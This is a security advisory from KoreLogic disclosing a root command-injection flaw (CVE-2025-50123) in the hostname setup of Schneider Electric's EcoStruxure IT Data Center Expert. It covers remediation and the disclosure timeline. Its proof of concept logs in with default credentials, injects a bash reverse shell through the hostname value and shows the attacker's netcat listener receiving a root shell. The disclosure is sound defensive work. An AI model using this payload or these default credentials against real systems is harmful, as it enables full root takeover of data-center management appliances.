-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 KL-001-2025-009: Schneider Electric EcoStruxure IT Data Center Expert Remote Command Execution Title: Schneider Electric EcoStruxure IT Data Center Expert Remote Command Execution Advisory ID: KL-001-2025-009 Publication Date: 2025-07-09 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2025-009.txt 1. Vulnerability Details Affected Vendor: Schneider Electric Affected Product: EcoStruxure IT Data Center Expert Affected Version: 8.3 and prior Platform: CentOS CWE Classification: CWE-1286: Improper Validation of Syntactic Correctness of Input, CWE-94: Improper Control of Generation of Code ('Code Injection') CVE ID: CVE-2025-50123 2. Vulnerability Description When performing the configuration of the Data Center Expert ("DCE") appliance, sufficient input sanitization is not performed on the value provided for the hostname of the appliance. The hostname variable can include a command terminator and subsequent commands, that will be executed with root privileges. 3. Technical Description In the .bcsetup script which drives and controls the SSH-based configuration of the appliance, the hostname value accepted from the user is not sufficiently sanitized. The script does check to ensure there is hostname value provided that includes (but not limited to) a valid hostname. def checkHostnameFormat(hn): result = False try: hostname_check = re.compile('[a-zA-Z0-9_-]+\.[a-zA-Z0-9_-]+\.[a-zA-Z0-9_-]+') result = hostname_check.match(hn) except: result = False return result A hostname value can be provided that passes this check, but that also includes a semi-colon followed by operating system commands. The .bcsetup script runs with root privileges, so the command(s) after the semi-colon are also executed with root privileges. It is likely this happens when the appliance attempts to perform DNS resolution: def resolveHostnameToIPAddr(new_hostname): global domain if ("" != domain): result_string = execOSCmd("host " + new_hostname) if (-1 == result_string.find("has address " + ipaddr)): return False else: return True return False 4. Mitigation and Remediation Recommendation Version 9.0 of EcoStruxure IT Data Center Expert includes fixes for these vulnerabilities and is available upon request from Schneider Electric's Customer Care Center. Refer to https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2025-189-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2025-189-01.pdf. 5. Credit This vulnerability was discovered by Jaggar Henry and Jim Becher of KoreLogic, Inc. 6. Disclosure Timeline 2024-11-21 : KoreLogic reports vulnerability details to Schneider Electric CPCERT. 2024-11-22 : Vendor acknowledges receipt of KoreLogic's submission. 2024-12-06 : Vendor confirms the reported vulnerability. 2024-12-12 : Vendor requests a meeting with KoreLogic to discuss the timeline of remediation efforts for this vulnerability, as well as for associated submissions from KoreLogic. 2024-12-18 : KoreLogic and Schneider Electric agree to embargo vulnerability details until product update 9.0, circa July, 2025. 2025-01-29 : Vendor provides status update. 2025-03-17 : Vendor provides beta release containing remediation for this and other associated vulnerabilities reported by KoreLogic. 2025-06-20 : Vendor notifies KoreLogic that the publication date for this vulnerability will be 2025-07-08. 2025-07-08 : Vendor public disclosure. 2025-07-09 : KoreLogic public disclosure. 7. Proof of Concept DCE Appliance: SSH in to the appliance using apcsetup / apcsetup (default credentials) and you will be placed in a restricted shell that runs a configuration utility. Accept or set the configuration settings until you get the the prompt for setting the hostname. When prompted for the hostname, provide the following value: "xyzzy.domain.com;bash -i >& /dev/tcp/192.168.2.1/18953 0>&1" ATTACKER BOX: $ nc -v -l -p 18953 -s 192.168.2.1 Listening on 192.168.2.1 18953 Connection received on 192.168.2.90 35780 [root@xyzzy ~]# id id uid=0(root) gid=0(root) groups=0(root) [root@xyzzy ~]# The contents of this advisory are copyright(c) 2025 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy -----BEGIN PGP SIGNATURE----- iQJOBAEBCAA4FiEEB12WYZwbVwYTJ/b2DKLsCTlWkekFAmhurhsaHGRpc2Nsb3N1 cmVzQGtvcmVsb2dpYy5jb20ACgkQDKLsCTlWkem5FQ//UT9Uk9sgWZy0uOMO+tcN +YKVVar8XZwx0jGuiO12BAJsvmdiM/5WlxhfMkvOedo2zfchlm+csDaMkPykkM8O O1hhrCwiTu8tloLm6imkjtck+jWCu0sMhvRUBKPMAgbcu0pnt9cenkiknf0E0qGz velYcMus84+1JpWfqG+IN6yRwb2AyprkqYLfYVNf9ispDwFRxQIrXPolG76CQZgC qEwZXwIqeYogaJN9HXy3CBigAX4n1M9bM3StQQVcR20dcihuuntjzIkW2GBu0Qwo IKfD24ZfT3JbYnMpqEhgVxaibitn3y4rhMsdlrDCmBfQlxOBbZwhoXV9maA4B/Nk /Sut0VZXXNIgHZTWNiHhzwbwgVK+Hicc1kk3w0Z+zNQaeTxjheXNF6p/mQK3Az1l 0a166BT5ltGHUMCY/8Jw3+0hHDDkxzzVIDlZEWtFitG1weHjetXpFj4OYOP5WMDG 8a1WmsIh6tGS5xdW6p0HyLHPNdc7CnrvdEm94YnFn3JKVIJJTduIE9Z1NJddBki2 q0oIbl91fBGCkMJ/FR2kCIFEJ3Ej8PZwW0B0KccSowwtAIO1cbte0g5Cjgq2Dir+ /WJTVa8SjyDDtrDDe5b5DrEg6nvMiriVMAHwSKK6/tUS9RasdIcE7VIH/l+fwTnJ raUp5puUmSPa0B46Yn4eRJU= =s/DS -----END PGP SIGNATURE-----